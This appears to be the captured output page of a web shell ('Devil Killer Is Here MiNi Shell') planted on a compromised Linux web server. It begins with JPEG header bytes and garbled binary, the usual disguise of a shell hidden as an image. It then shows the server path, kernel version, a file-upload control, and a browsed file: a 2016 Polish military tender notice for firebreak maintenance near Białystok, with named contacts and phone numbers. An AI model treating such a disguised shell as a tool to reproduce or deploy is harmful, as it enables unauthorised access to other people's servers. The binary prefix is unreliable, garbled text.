JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/119330-N-2016.html

<p class="kh_header"><b>Białystok: Mineralizacja pasów ppoż. Łomża, Plewki, Hajnówka, Osowiec, Białystok oraz usługa ochrony ppoż. Terenu przyległego do wału strzelnicy garnizonowej OC Zielona</b><br>
<b>Numer ogłoszenia: 119330 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 25 Wojskowy Oddział Gospodarczy w Białymstoku , ul. Kawaleryjska 70, 15-601 Białystok, woj. podlaskie, tel. 261 398 839, faks 261 398 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.25wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostk Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Mineralizacja pasów ppoż. Łomża, Plewki, Hajnówka, Osowiec, Białystok oraz usługa ochrony ppoż. Terenu przyległego do wału strzelnicy garnizonowej OC Zielona.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa mineralizacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG Białystok oraz usługa ochrony przeciwpożarowej terenów przyległych do wału strzelnicy garnizonowej OC Zielona.
2.Usługa została podzielona na cztery części:
2.1 Część I
Mineralizacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona
2.2 Część II
Mineralizacja pasów przeciwpożarowych - rejon Skład Osowiec.
2.3 Część III
Pielęgnacja wałów przeciwpożarowych (koszenie wałów przeciwpożarowych) - Skład Hajnówka.
2.4 Część IV
Mineralizacja pasów przeciwpożarowych - rejon Plewki.
3.Warunki ogólne:
3.1 Zmineralizowane pasy i wały przeciwpożarowe na dzień odbioru muszą być oczyszczone z gałęzi, samosiejek, wykoszonych lub wyoranych traw, wrzosów itp.
3.2 Mineralizacja pasów musi być wykonana poprzez orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową. W miejscach niedostępnych dla ciągnika rolniczego pasy należy zmineralizować glebogryzarką ręczną. 
3.3 Szczegółowy zakres robót oraz ich częstotliwość określona została dla każdej części usługi w szczegółowym zakresie działania odrębnie, z uwagi na specyfikę przyrodniczą kompleksów.
3.4 Upoważniony przedstawiciel Zamawiającego lub osoba przez niego wyznaczona wskaże Wykonawcy miejsce realizacji usługi.
3.5 Wykonawca przed przystąpieniem do realizacji usługi dostarcza do Infrastruktury 25 WOG listę pracowników i wykaz sprzętu uczestniczącego w  zadaniu. 
3.6 Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem prac ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego, zgodnie z Decyzją Nr 21/MON Ministra Obrony Narodowej z dnia 10.02.2012 roku w sprawie planowania i realizowania przedsięwzięć współpracy międzynarodowej w resorcie obrony narodowej (Dz.Urz. MON poz. 33). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu.
3.7 Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy w miejscu realizacji robót oraz zachowanie bezpieczeństwa pożarowego.
3.8 Pracownicy Wykonawcy przed przystąpieniem do realizacji usługi zostaną zapoznani przez przedstawiciela Użytkownika lub osobę przez niego upoważnioną z uregulowaniami dotyczącymi wstępu na obszar chroniony, z systemem przepustkowym, zakazami lub nakazami obowiązującymi na danym terenie, w tym używania telefonów komórkowych, wykonywania zdjęć, przyjmowania interesantów itp.  
3.9 Przed rozpoczęciem robót wszyscy pracownicy realizujący usługę na terenie kompleksów wojskowych 2RBLog w Składach Hajnówka i Osowiec powinni okazać zaświadczenie o aktualnym szkoleniu w zakresie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010 rok o ochronie informacji niejawnych (Dz.U. z 2010r. Nr 182, poz.1228). W przypadku braku zaświadczenia o szkoleniu z zakresu ochrony informacji niejawnych zostanie ono przeprowadzone przez Pełnomocnika Ochrony Informacji Niejawnych 2RBLog lub osobę przez niego upoważnioną. Szkolenie przeprowadzone będzie bezpłatnie.
3.10 Terminy przeprowadzenia zabiegów określono szczegółowo w każdej części zadania. Wykonana usługa musi być potwierdzona protokołem odbioru podpisanym przez Wykonawcę i upoważnionego przedstawiciela Zamawiającego. Brak protokołu podpisanego przez przedstawiciela Zamawiającego będzie równoznaczne z niewykonaniem usługi. Protokół odbioru usługi z każdego zabiegu jest załącznikiem do faktury VAT wystawionej przez Wykonawcę. Wyszczególnione w opisie przedmiotu zamówienia czynności Wykonawca zamówienia wykonuje na własny koszt. Wykonawca ma obowiązek zachować w tajemnicy wszelkie informacje uzyskane w czasie pracy.
Usługi powinny być zrealizowane zgodnie z obowiązującymi normami branżowymi, przepisami ochrony środowiska i bez stworzenia zagrożeń dla zdrowia ludzi.
4.Przewiduję się wizję lokalną w celu oszacowania stopnia trudności i warunków realizacji zadania, 
Część 1, na dzień, 19 maja 2016r., godz. 9:00, Marzena WILUK, tel. 261 39 81 11,
Część 2, na dzień, 18 maja 2016r., godz.   9:00, Tadeusz JAŃCZYŁŁO, tel. 261 38 61 03, 
Część 3, na dzień, 19 maja 2016r., godz. 13:00, Paweł PATEJUK, tel. 261 343 744, 
Część 4, na dzień 18 maja 2016r., godz.  13:00, Józef KRASUCKI, tel. 261 343 744
5.Szczegółowy zakres działania:
Część I - rejon Sowlany Karakule - OC Zielona
Mineralizacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Białystok.
2.Mineralizacja istniejących pasów przeciwpożarowych o szerokości 3 m i szacunkowej długości  7,500 m (powierzchnia 2,250 ha) poprzez:
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt
3.Wycinka samosiejek i wykoszenie trawy na terenie o łącznej powierzchni 3 ha w miejscach wskazanych przez Zamawiającego poprzez:
a.wykoszenie trawy, chwastów oraz wycięciu samosiejek na wskazanej powierzchni, przy czym wysokość trawy po skoszeniu nie powinna być wyższa niż 7 cm, a pozostałych pni po samosiejkach 10 cm,
b.wykoszone trawy i chwasty należy zebrać i wywieźć na koszt Wykonawcy a wycięte samosiejki złożyć w miejscu wskazanym przez Zamawiającego.
c.wycince podlegają samosiejki - krzewy w wieku do 10 lat oraz samosiejki o obwodzie na wysokości 5 cm od podstawy .
4.Częstotliwość wykonywania zabiegów:
a.mineralizacja pasów  ppoż. - dwa razy w roku: 
I termin - do 30.06.2016r.
II termin - od 01.10.2016r. do 31.10.2016r.
b.wycinka samosiejek i wykoszenie trawy - jeden raz w roku od 01.08.2016r. do 31.08.2016r.
5.Wykonanie oprysków środkiem chwastobójczym - jeden raz w roku od 01.08.2016r do 15.08.2016r.
Część II - rejon Skład Osowiec
Mineralizacja pasów przeciwpożarowych - rejon Skład Osowiec.
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.Rodzaj prac do wykonania:
a.Mineralizacja pasów ppoż. przy budynkach magazynowych oraz pasów obwodnicy (łączna powierzchnia pasów 13,600 ha) poprzez  wykonanie orki pługiem a w miejscach niedostępnych dla ciągnika rolniczego glebogryzarką ręczną, bronowanie przeoranych pasów wraz z oczyszczeniem mineralizowanego terenu, oraz oczyszczeniem ogrodzenia obwodnicy usytuowanego na pasach ppoż.  z wszelkiej wrastającej roślinności, chwastów i samosiejek. 
b.przy budynkach magazynowych o szerokości 2 m i łącznej powierzchni 0,68 ha;
c.wzdłuż ogrodzeń obwodnicy (pasy zewnętrzne i wewnętrzne) o szerokości 5 m, długości 15 240 m i łącznej powierzchni 7,62 ha
d.wzdłuż ogrodzenia zewnętrznego kompleksu od strony drogi krajowej nr 65 o szerokości 2 m i długości 2 200m (powierzchnia 0,11 ha), szerokości 3 m i długości 575 m (powierzchnia 0,17 ha)
e.pas ochronny usytuowany po obu stronach drogi wewnętrznej między ogrodzeniem o szerokości 7,00 m i długości 7200 m (powierzchnia 5,04 ha)
f.Zakres usługi obejmuje:
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt,
c.usuwanie wszelkiej wrastającej roślinności, chwastów i samosiejek z całej powierzchni ogrodzeń usytuowanych na pasach przeciwpożarowych.
d.wykonanie oprysków wzdłuż ogrodzenia obwodnicy 
3.Częstotliwość wykonywania zabiegów:
I termin - do 30.06.2016r.
II termin - od 15.07.2016r. 30.07.2016r.
III termin - od 15.08.2016r. 30.08.2016r.
IV termin - od 15.09.2016r. 30.09.2016r.
Część III - rejon Skład Hajnówka
Pielęgnacja wałów przeciwpożarowych (koszenie wałów przeciwpożarowych) - Skład Hajnówka.
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Hajnówka.
2.Koszenie trawy na wałach przeciwpożarowych budynków magazynowych o łącznej powierzchni 6,875 ha.
3.Wały przeciwpożarowe zostaną wskazane Wykonawcy przed przystąpieniem do realizacji umowy.
4.Zakres usługi obejmuje:
a.koszenie wałów do granic pasów ppoż. poszczególnych budynków,
b.wygrabienie skoszonej trawy i wywiezienie jej na koszt Wykonawcy,
c.uprzątnięcie podjazdów i opasek wokół budynków po koszeniu.
5.Częstotliwość wykonywania zabiegów - trzy razy w roku:
I termin - do 30.06.2016r.
II termin - od 01.08.2016r. 20.08.2016r.
III termin - od 10.09.2016r. 30.09.2016r.
Część IV - rejon Plewki
Pielęgnacja pasa przeciwpożarowego - Plewki
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.Mineralizacja istniejącego pasa przeciwpożarowego wzdłuż ogrodzenia JW. 2031 o szerokości 2 m; długość 868 m (powierzchnia 0,174 ha) poprzez: 
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt.
3.Częstotliwość wykonywania zabiegów - cztery razy w roku: 
I termin - do 30.06.2016r.
II termin - od 15.07.2016r. 30.07.2016r.
III termin - od 15.08.2016r. 30.08.2016r.
IV termin - od 15.09.2016r. 30.09.2016r.
6.Zamawiający dopuszcza powierzenie części zamówienia podwykonawcom i jednocześnie żąda wskazania przez Wykonawcę w ofercie, którą część zamówienia zamierza powierzyć podwykonawcom zgodnie z art. 36b ustawy Pzp. 
7.W Załącznikach do SIWZ (Projekty umów) w § 11 Zamawiający określa zasady powierzenia części zamówienia podwykonawcom..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany na każdej stronie wg wzoru Zamawiającego (załącznik nr 1 do SIWZ).PEŁNOMOCNICTWO 
W przypadku podpisania oferty lub załączonego do niej jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną do reprezentacji wprost z postanowień KRS lub CEIDG (Centralna Ewidencja i Informacja o Działalności Gospodarczej) należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego - oryginał lub notarialnie potwierdzoną kopię dokumentu. W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy pzp)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy, 
w stosunku do treści oferty, w zakresie:
1)sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielenia zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona
2)terminu realizacji przedmiotu zamówienia ( w sposób proporcjonalny), gdy wystąpi zjawisko siły wyższej mające wpływ na termin realizacji. Podstawą dokonania zmiany będzie wniosek złożony przez Wykonawcę w terminie 30 dni od wystąpienia zjawiska siły wyższej wraz z dokumentacją potwierdzającą, że miało ono bezpośredni wpływ na wykonanie umowy
2.Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.25wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzyskanie SIWZ następuje na wniosek złożony na adres Zamawiającego lub przez pobranie w siedzibie Zamawiającego albo ze strony internetowej Zamawiającego: www.25wog.wp.mil.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2016 godzina 09:00, miejsce: Kancelaria Jawna (budynek nr 43) znajduje się na terenie 
25 Wojskowego Oddziału Gospodarczego, gdzie obowiązuje system przepustek wydawanych przy wejściu, po okazaniu dowodu tożsamości..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





